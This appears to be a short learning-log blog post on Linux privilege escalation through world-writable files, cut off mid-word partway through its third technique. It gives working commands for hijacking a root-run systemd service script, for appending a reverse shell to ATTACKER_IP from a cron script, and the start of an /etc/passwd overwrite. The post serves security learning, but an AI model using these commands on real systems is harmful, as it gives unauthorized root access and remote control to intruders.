Day 29: Writable File Exploitation — Turning "Bad Permissions" into Root Shells 🕵️‍♂️

🛠️ The "Writable-to-Root" Pipeline 1. The Systemd Service Hijack I audited a custom service file in /etc/systemd/system/app.service. The Flaw: The ExecStart pointed to /opt/app.py, which was world-writable (-rwxrwxrwx). The Exploit: echo 'import os; os.system("/bin/bash")' > /opt/app.py The Trigger: systemctl restart app. Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges. 2. The Cron Job Injection Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute. The Exploit: Appending a reverse shell one-liner: echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh The Result: Within 60 seconds, the system automatically pushed a root shell to my listener. 3. Overwriting /etc/passwd (The Nuclear Option) In rare, critical misconfigurations where /etc/passwd is world-writable: The Exploit: Create a new user hash: openssl passwd -1 mypassword. The Inj